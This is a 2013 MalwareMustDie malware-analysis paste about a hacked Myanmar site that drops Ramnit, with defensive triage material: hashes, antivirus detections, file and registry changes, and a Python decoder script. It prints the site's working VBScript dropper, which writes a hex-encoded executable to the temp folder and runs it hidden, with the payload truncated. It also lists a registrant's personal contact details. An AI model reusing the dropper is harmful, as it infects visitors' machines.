MalwareMustDie

#MalwareMustDie - Thou Shalt Not Hack + Inject Malware!!

Mar 2nd, 2013
# MalwareMustDie! @unixfreaxjp /malware]$ date
# Sat Mar  2 15:33:51 JST 2013
# Case: ...And the Hack Group Re-using the old-timer Malware..
#       in this case: RAMNIT!!

// The below domain was just hacked....

Domain Name: MYANWEBS.COM
Registrar: GODADDY.COM, LLC
Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
Domain Name: MYANWEBS.COM
   Created on: 29-Nov-10
   Expires on: 29-Nov-13
   Last Updated on: 06-Nov-12

Registrant:
   TKT Web Studio
   No.45, Shwe Ta Chaung Road, Pyay, Pegu
   Yangon,  NA, Myanmar

Administrative/Technical Contact:
   AUNG, KYAW KYAW  kyawkyaw26273@gmail.com
   TKT Web Studio
   No.45, Shwe Ta Chaung Road, Pyay, Pegu
   Yangon,  NA
   Myanmar
   +95.5326506

Domain servers in listed order:
   NS1.MYANWEBS.COM    NS2.MYANWEBS.COM
   NS3.MYANWEBS.COM    NS4.MYANWEBS.COM
   NS5.MYANWEBS.COM

// The hacked domain spreads the malware via the below URL...

h00p://penjaga123.myanwebs.com/

// Let's check it out....
// fetch and check...

--2013-03-02 14:42:02--  h00p://penjaga123.myanwebs.com/
Resolving penjaga123.myanwebs.com... seconds 0.00, 209.51.196.242
Caching penjaga123.myanwebs.com => 209.51.196.242
Connecting to penjaga123.myanwebs.com|209.51.196.242|:80... seconds 0.00, connected.
  :
GET / HTTP/1.0
Referer: http://malwaremustdie.blogspot.com
User-Agent: MalwareMustDie Still Banging Malware Moronz!
Host: penjaga123.myanwebs.com
HTTP request sent, awaiting response...
   :
HTTP/1.0 200 OK
Date: Sat, 02 Mar 2013 05:41:45 GMT
Server: ATS/3.2.0
Cache-Control: no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform
Expires: Sat, 02 Mar 2013 05:41:45 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Type: text/html
Age: 2
Connection: close
  :
200 OK
Length: unspecified [text/html]
Saving to: `index.html'
2013-03-02 14:42:09 (140 KB/s) - `index.html' saved [824550]


// looks like this... (elinks)
                                                                             [lol.gif]
                                                                              #OPWorld

   __________________________________________________________________________________________
   __________________________________________________________________________________________

   hello world ..
   This is the operation for the country of Myanmar.
   Do not have the name of religion to carry out attacks on our site!
   Our silence is not because we are weak,
   we only demand retribution for our site that you hack ..
   Lamers you simply useless! Our army is god ..
   without insulting religion and your beliefs.
   This is our way!

    Thank's: Legend Irhabi007 - Hmei7 - Syntax_error - 3vil666 - Bocah Netter -
   Drac Code 101 - Mujahidin Cyber  // animated...

  __________________________________________________________________________________________
  __________________________________________________________________________________________

  IFRAME: h00p://w.soundcloud.com/player/?url=http%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F80972118&auto_play=true&show_artwork=true&color=ff7700
                                               // some f*ckin music...

// Using below METAs:

<meta name="revisit-after" content="3">
<meta name="rating" content="general">
<meta name="classification" content="Internet Services">
<meta name="googlebot" content="index,follow">
<meta name="google rank" content="1">
<meta name="robots" content="all">
<meta name="robots schedule" content="auto">


// Saves the malware binary to the PC as svchost.exe via VBScript,
// method: CreateObject("Scripting.FileSystemObject")
//
// and runs it by using the Windows Script WScript.Shell.Run...

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000
000000000000000000000000000000000000000000000000000000000000000E800000
00E1FBA0E00B409CD21B80120444F53206D6F64652E0D0D0A2400000000000000D72D8
  :
  :
83B00C8B43A419EA051319A4422C6694D6B9006D4C6BFA184413161CDB446B9B5816E556
47B2B925A289418B2F487D4B8E713A64E68F01A930573A8B1B5BD2C84C0720CCB99C5915
62791956C46A1352C2B8DB97C0B643016782B16B5F3FEC20D28029FB257E1208E92338BB
A8B1CCBF43994903D0831640459BE377D495BF10A5341C85CCA36FBDA94A1D37279AFEBF
34F996CAB780F9D948558655C4B019DAF9F4F6100EC46591F2024F9263448E14178B9DBB
44CA67E42C9B151B938631D3FCD4401FCCAB15106DBB151"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
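As an added example (not code from the paste or from the MalwareMustDie team), a Python triage script that pulls this kind of hex-encoded VBScript dropper out of a saved HTML page, decodes the WriteData string the same way the For/Mid loop does, checks for the MZ magic, hashes the embedded file and lists the behaviours worth flagging: the FileSystemObject write into GetSpecialFolder(2) (the temp folder) and the WScript.Shell.Run with window style 0 (hidden). The HTML inside it is constructed with a 32-byte stub header, not the Ramnit binary.

```python
import hashlib
import re
from typing import Optional

# Constructed sample page (not the paste above): same dropper shape as the
# VBScript on the page (DropFileName, WriteData, FSO write loop, hidden
# WScript.Shell.Run), but the hex payload is a hand-made 32-byte MZ header
# stub rather than the Ramnit binary.
SAMPLE_HTML = """<html><body><p>hello world ..</p>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000
B8000000000000004000000000000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
</body></html>
"""

# Behaviours a defender wants flagged in any VBScript block, by short label.
INDICATOR_PATTERNS = {
    "fso_write":   re.compile(r"Scripting\.FileSystemObject", re.I),
    "temp_folder": re.compile(r"GetSpecialFolder\s*\(\s*2\s*\)", re.I),   # %TEMP%
    "hex_loop":    re.compile(r'Chr\s*\(\s*CLng\s*\(\s*"&H"', re.I),     # hex -> bytes
    "wsh_run":     re.compile(r"WScript\.Shell", re.I),
    "hidden_run":  re.compile(r"\.Run\s+[^,\n]+,\s*0\b", re.I),          # window style 0
}

SCRIPT_RE = re.compile(r"<script[^>]*vbscript[^>]*>(.*?)</script>", re.I | re.S)
DROPNAME_RE = re.compile(r'DropFileName\s*=\s*"([^"]+)"', re.I)
WRITEDATA_RE = re.compile(r'WriteData\s*=\s*"([^"]*)"', re.I)


def find_vbscript_blocks(html: str) -> list:
    """Return the bodies of all <script ... vbscript ...> blocks in the page."""
    return SCRIPT_RE.findall(html)


def decode_vbs_hex(hexstr: str) -> bytes:
    """Decode the payload exactly as the dropper's loop does: two characters
    per byte via CLng("&H" & Mid(...)), so a lone trailing nibble is one byte."""
    cleaned = re.sub(r"\s+", "", hexstr)
    out = bytearray()
    for i in range(0, len(cleaned), 2):
        out.append(int(cleaned[i:i + 2], 16) & 0xFF)
    return bytes(out)


def triage(html: str) -> Optional[dict]:
    """Describe the first VBScript block that carries a WriteData payload,
    or return None when the page has no such dropper."""
    for script in find_vbscript_blocks(html):
        m = WRITEDATA_RE.search(script)
        if not m:
            continue
        payload = decode_vbs_hex(m.group(1))
        name = DROPNAME_RE.search(script)
        hits = [label for label, rx in INDICATOR_PATTERNS.items() if rx.search(script)]
        return {
            "drop_name": name.group(1) if name else None,
            "payload_len": len(payload),
            "is_pe": payload[:2] == b"MZ",   # DOS header magic, as in the hexdump
            "md5": hashlib.md5(payload).hexdigest(),
            "sha256": hashlib.sha256(payload).hexdigest(),
            "indicators": hits,
        }
    return None


if __name__ == "__main__":
    for key, value in (triage(SAMPLE_HTML) or {}).items():
        print(f"{key:12}: {value}")
```

Point it at a saved index.html and the hashes it prints can be compared against the dropped-binary hashes listed below, without ever executing the script.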


// dropped binary:

MD5    : e450435280ba806dc2d8115b172e1e40
SHA256 : 3c3bda34253d238f78bf7915982956d872bcdc4f21e92287e462e7e8d976abe8

Sections:
  .text 0x1000 0x2200 8704
  .data 0x4000 0x9730 4608
  .rsrc 0xe000 0x78c 2048
  .rdata 0xf000 0x1ae0f 108559
  kgoodcb 0x2a000 0x13000 77824 <==== needs unpacking/decoding
  .text 0x3d000 0x33000 205824 <=== needs unpacking/decoding

Entry Point at 0x31a00
Virtual Address is 0x43d000
CRC Fail: Claimed:  0, Actual:  416781
Compile Time: 0x40617B91 [Wed Mar 24 12:14:09 2004 UTC]

// Faking Adobe software...

 LangID: 040904b0
 LegalCopyright: Copyright \xa9 1996-2003 Macromedia, Inc.
 InternalName: Macromedia Flash Player 7.0
 FileVersion: 7,0,19,0
 CompanyName: Macromedia, Inc.
 LegalTrademarks: Macromedia Flash Player
 ProductName: Shockwave Flash
 ProductVersion: 7,0,19,0
 FileDescription: Macromedia Flash Player 7.0  r19
 OriginalFilename: SAFlashPlayer.exe

// Hex:

0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   D7 2D 86 2D 93 4C E8 7E 93 4C E8 7E 93 4C E8 7E    .-.-.L.~.L.~.L.~
0090   8F 03 B7 7E 91 4C E8 7E 9C 74 88 7E D3 4D E8 7E    ...~.L.~.t.~.M.~
00A0   C6 44 B3 7E 8E 4C E8 7E A0 CB E7 7E 92 4C E8 7E    .D.~.L.~...~.L.~
00B0   50 43 B7 7E B1 4C E8 7E 83 38 B2 7E 9F 4C E8 7E    PC.~.L.~.8.~.L.~
00C0   3A C2 B5 7E 92 4C E8 7E 52 69 63 68 93 4C E8 7E    :..~.L.~Rich.L.~
00D0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
00E0   00 00 00 00 00 00 00 00 50 45 00 00 4C 01 06 00    ........PE..L...
00F0   91 7B 61 40 00 00 00 00 00 00 00 00 E0 00 0F 01    .{a@............
0100   0B 01 06 04 00 22 00 00 00 E0 01 00 00 08 00 00    ....."..........
0110   00 D0 03 00 00 10 00 00 00 40 00 00 00 00 40 00    .........@....@.
0120   00 10 00 00 00 02 00 00 04 00 00 00 05 00 01 00    ................
0130   04 00 00 00 00 00 00 00 00 00 07 00 00 04 00 00    ................
0140   00 00 00 00 02 00 00 80 00 00 40 00 00 60 00 00    ..........@..`..
0150   00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00    ..@.............
0160   00 00 00 00 00 00 00 00 AC 16 00 00 A0 00 00 00    ................
0170   00 E0 00 00 8C 07 00 00 D0 43 00 00 18 00 00 00    .........C......
0180   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0190   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
01A0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
01B0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
01C0   00 10 00 00 B0 01 00 00 00 00 00 00 00 00 00 00    ................
01D0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
01E0   2E 74 65 78 74 00 00 00 00 22 00 00 00 10 00 00    .text...."......


// Quick reputation check on VirusTotal...

URL:       https://www.virustotal.com/en/file/3c3bda34253d238f78bf7915982956d872bcdc4f21e92287e462e7e8d976abe8/analysis/1362204046/
SHA256:    3c3bda34253d238f78bf7915982956d872bcdc4f21e92287e462e7e8d976abe8
SHA1:      823cb691fa3193ff7bb7fd071acf9d1f68edf527
MD5:       e450435280ba806dc2d8115b172e1e40
File size: 399.9 KB ( 409536 bytes )
File name: SAFlashPlayer.exe
File type: Win32 EXE
Tags:      peexe
Detection: 41 / 46
Analysis:  2013-03-02 06:00:46 UTC ( 5 minutes ago )

Malware Names:
nProtect                 : Virus/W32.SpyEye
CAT-QuickHeal            : W32.Ramnit.A
McAfee                   : W32/Ramnit.a
Malwarebytes             : Trojan.Downloader
K7AntiVirus              : Virus
Agnitum                  : Win32.Sality.BK
F-Prot                   : W32/Ramnit.D
Symantec                 : Packed.Protexor!gen1
Norman                   : Sality.ZHB
TotalDefense             : Win32/Ramnit.C
TrendMicro-HouseCall     : PE_RAMNIT.DEN
Avast                    : Win32:RmnDrp
ClamAV                   : W32.Ramnit-3
Kaspersky                : Virus.Win32.Nimnul.a
BitDefender              : Win32.Ramnit.N
NANO-Antivirus           : Virus.Win32.Nimnul.bmnup
ViRobot                  : Win32.Nimnul.A
Emsisoft                 : Win32.Ramnit.N (B)
Comodo                   : Virus.Win32.Ramnit.K
F-Secure                 : Win32.Ramnit.N
DrWeb                    : Win32.Rmnet.8
VIPRE                    : Virus.Win32.Ramnit.b (v)
AntiVir                  : W32/Ramnit.C
TrendMicro               : PE_RAMNIT.DEN
McAfee-GW-Edition        : Heuristic.BehavesLike.Win32.Suspicious-BAY.K
Sophos                   : W32/Ramnit-A
Jiangmin                 : Win32/IRCNite.wi
Kingsoft                 : Win32.Ramnit.lx.30720
Microsoft                : Virus:Win32/Ramnit.I
SUPERAntiSpyware         : Trojan.Agent/Gen-Pune
GData                    : Win32.Ramnit.N
Commtouch                : W32/Ramnit.D
AhnLab-V3                : Win32/Ramnit.I
VBA32                    : Virus.Win32.Nimnul.b
PCTools                  : HeurEngine.Protexor
ESET-NOD32               : Win32/Ramnit.H
Rising                   : Win32.Mgr.a
Ikarus                   : Virus.Win32.Ramnit
Fortinet                 : W32/Ramnit.C
AVG                      : Win32/Zbot.G
Panda                    : W32/Nimnul.A


// Files created / overwritten by the malware:

C:\Documents and Settings\User\Local Settings\Temp\winncbnga.exe
C:\Program Files\Microsoft\WaterMark.exe
C:\TEST\samplemgr.exe
C:\WINDOWS\system32\dmlconf.dat
C:\WINDOWS\system.ini

// Kicked-off processes...

0x1dc   WaterMark.exe   C:\Program Files\Microsoft\WaterMark.exe
0x1e4   WaterMark.exe   C:\Program Files\Microsoft\WaterMark.exe
0x20c   svchost.exe C:\WINDOWS\system32\svchost.exe  // this binary..
0x210   svchost.exe C:\WINDOWS\system32\svchost.exe  // this binary..

// Loaded SYS/driver

\SystemRoot\System32\Drivers\Fastfat.SYS

// all of these registry keys are deleted....

HKLM\System\CurrentControlSet\Control\SafeBoot\AlternateShell   REG_SZ  16  "cmd.exe"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}REG_SZ  66  "Universal Serial Bus controllers"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}REG_SZ  26  "CD-ROM Drive"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}REG_SZ  20  "DiskDrive"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}REG_SZ  64  "Standard floppy disk controller"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}REG_SZ  8   "Hdc"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}REG_SZ  18  "Keyboard"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}REG_SZ  12  "Mouse"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}REG_SZ  32  "PCMCIA Adapters"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}REG_SZ  24  "SCSIAdapter"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}REG_SZ  14  "System"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}REG_SZ  36  "Floppy disk drive"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}REG_SZ  14  "Volume"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}REG_SZ  48  "Human Interface Devices"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\AppMgmt\ REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Base\    REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Boot Bus Extender\   REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Boot file system\    REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\CryptSvc\    REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\DcomLaunchREG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmadmin\ REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmboot.sysREG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys\    REG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sysREG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmserver\    REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\EventLog\    REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\File system\ REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\FilterREG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\HelpSvc\ REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Netlogon\    REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PCI Configuration\   REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PlugPlay\    REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PNP FilterREG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Primary disk\    REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\RpcSs\   REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SCSI ClassREG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\sermouse.sys\    REG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\sr.sysREG_SZ  50  "FSFilter System Recovery"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SRService\   REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\System Bus Extender\ REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys\ REG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\vgasave.sys\ REG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinMgmt\ REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}REG_SZ  66  "Universal Serial Bus controllers"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}REG_SZ  26  "CD-ROM Drive"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}REG_SZ  20  "DiskDrive"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}REG_SZ  64  "Standard floppy disk controller"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}REG_SZ  8   "Hdc"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}REG_SZ  18  "Keyboard"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}REG_SZ  12  "Mouse"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}REG_SZ  8   "Net"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}REG_SZ  20  "NetClient"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}REG_SZ  22  "NetService"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}REG_SZ  18  "NetTrans"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}REG_SZ  32  "PCMCIA Adapters"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}REG_SZ  24  "SCSIAdapter"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}REG_SZ  14  "System"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}REG_SZ  36  "Floppy disk drive"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}REG_SZ  14  "Volume"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}REG_SZ  48  "Human Interface Devices"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AFD\ REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\ REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Base\    REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\   REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Boot file system\    REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Browser\ REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\    REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\DcomLaunchREG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Dhcp\    REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmadmin\ REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmboot.sysREG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\    REG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmload.sysREG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmserver\    REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\DnsCache\    REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\EventLog\    REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\File system\ REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\FilterREG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\ REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\   REG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\   REG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\    REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\   REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LmHosts\ REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Messenger\   REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\    REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NDIS\    REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\ REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\ REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\    REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBT\   REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\ REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Netlogon\    REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetManREG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Network\ REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\ REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\ REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\   REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\    REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PNP FilterREG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\ REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Primary disk\    REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sysREG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\   REG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\   REG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\   REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\RpcSs\   REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SCSI ClassREG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\    REG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\    REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\sr.sysREG_SZ  50  "FSFilter System Recovery"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SRService\   REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\ REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\ REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Tcpip\   REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\TDI\ REG_SZ  26  "Driver Group"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sysREG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\   REG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\termservice\ REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\vga.sys\ REG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\ REG_SZ  14  "Driver"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\ REG_SZ  16  "Service"
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\WZCSVCREG_SZ  16  "Service"


// Newly added registry keys/values:

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline  REG_DWORD   4   0x0
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools REG_DWORD   4   0x1
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr   REG_DWORD   4   0x1
HKLM\Software\Microsoft\Security Center\Svc\AntiVirusDisableNotify  REG_DWORD   4   0x1
HKLM\Software\Microsoft\Security Center\Svc\AntiVirusOverride   REG_DWORD   4   0x1
HKLM\Software\Microsoft\Security Center\Svc\FirewallDisableNotify   REG_DWORD   4   0x1
HKLM\Software\Microsoft\Security Center\Svc\FirewallOverride    REG_DWORD   4   0x1
HKLM\Software\Microsoft\Security Center\Svc\UacDisableNotify    REG_DWORD   4   0x1
